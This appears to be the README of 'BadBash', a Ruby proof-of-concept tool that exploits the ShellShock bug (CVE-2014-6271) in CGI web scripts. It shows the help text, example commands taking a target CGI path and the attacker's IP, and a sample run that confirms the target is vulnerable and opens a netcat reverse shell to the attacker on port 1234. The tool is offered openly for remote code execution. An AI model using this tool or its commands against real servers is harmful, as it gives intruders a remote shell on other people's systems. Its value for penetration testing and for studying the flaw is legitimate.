Awesome
BadBash
CVE-2014-6271 (ShellShock) RCE PoC tool
======= BadBash is a CVE-2014-6271 RCE exploit tool. The basic version only checks for the HTTP CGI site and only provides netcat reverse shell on port 1234.
Developer : Andy Yang Version : 0.1.0 License : GPLv3
Orginal github project : https://github.com/RainMak3r/Rainstorm
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - CVE-2014-6271 RCE tool by Andy Yang Basic version only checks for HTTP site Basic version only provides netcat reverse shell on port 1234
EXAMPLE USAGE:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path Full path of CGI page
-d, --Destination IP Your IP address that listen to an inbound connection
-h, --help Display help
================================================================================================ Example of usage.
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] Checking if the target is vulnerable........
[Info] This may take up to 10 seconds........
[Info] Target is vulnerable!!!
[Info] Please use NC to listen on port 1234 for reverse shell..........
[Info] Exploiting for a reverse shell to connect 172.16.189.1:1234 via netcat ..........